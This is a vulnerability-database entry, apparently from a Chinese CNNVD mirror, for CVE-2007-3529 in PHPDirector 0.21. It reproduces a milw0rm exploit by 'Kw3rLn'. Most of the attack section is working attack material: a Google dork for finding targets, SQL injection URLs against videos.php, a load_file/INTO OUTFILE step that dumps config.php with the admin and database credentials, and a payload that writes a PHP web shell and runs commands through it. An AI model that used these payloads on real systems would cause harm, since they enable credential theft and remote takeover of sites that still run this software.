PHPDirector 参数空值漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113237 漏洞类型 未知
发布时间 2007-07-02 更新时间 2007-07-03
CVE编号 CVE-2007-3529 CNNVD-ID CNNVD-200707-022
漏洞平台 PHP CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/4139
https://www.securityfocus.com/bid/85615
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-022
|漏洞详情
PHPDirector0.21及之前版本中的videos.php使远程攻击者可以借助id[]参数的一个空值获得敏感信息。这会在错误信息中显示路径。
|漏洞EXP
PHPDirector <= 0.21 (SQL injection/Upload SHELL) Remote Vulnerabilities

WEB APP: PHPDirector 0.21
SITE: http://www.phpdirector.co.uk/site/
DORK: "Powered by PHP Director"

AUTHOR: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]

* Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET

DESCRIPTION: - SQL injection in $id of videos.php
             - admin & password are in config.php :-(
             - Path disclosure
             - It doesn`t deserve to make an sploit

EXPLOIT:

SQL INJECTION: http://www.site.com/videos.php?id=-1%20UNION%20SELECT%20name,news,vids_per_page,version,template,6,7,8,9,10,11,12,13,14,15%20FROM%20pp_config

FIND ADMIN PASS & DB INFO:
1. We must have teh path .. check: http://www.site.com/videos.php?id[]= (path disclosure)
2. http://www.site.com/videos.php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,load_file('[path_you_just_found]/config.php')%20FROM%20pp_config%20into%20outfile%20'[path_you_just_found]/config.txt'
3. Now check: http://www.site.com/config.txt

UPLOAD SHELL:
1. We must have teh path .. check: http://www.site.com/videos.php?id[]= (path disclosure)
2. http://www.site.com/videos.php?id=-1%20UNION%20SELECT%201,'<?php%20system($_GET[cmd]);%20?>',3,4,5,6,7,8,9,10,11,12,13,14,15%20INTO%20OUTFILE%20'[path_founded]/shell.php'%20FROM%20pp_config
3. http://www.site.com/shell.php?cmd=uname -a


GREETZ: all memberz of RST and milw0rm
//kw3rln [http://rstzone.net]

# milw0rm.com [2007-07-02]
|受影响的产品
PHPDirector PHPDirector 0.21
|参考资料

来源:MILW0RM
名称:4139
链接:http://www.milw0rm.com/exploits/4139
来源:XF
名称:phpdirector-videos-information-disclosure(35221)
链接:http://xforce.iss.net/xforce/xfdb/35221
来源:BUGTRAQ
名称:20070702PHPDirector<=0.21(SQLinjection/UploadSHELL)RemoteVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/472661/100/0/threaded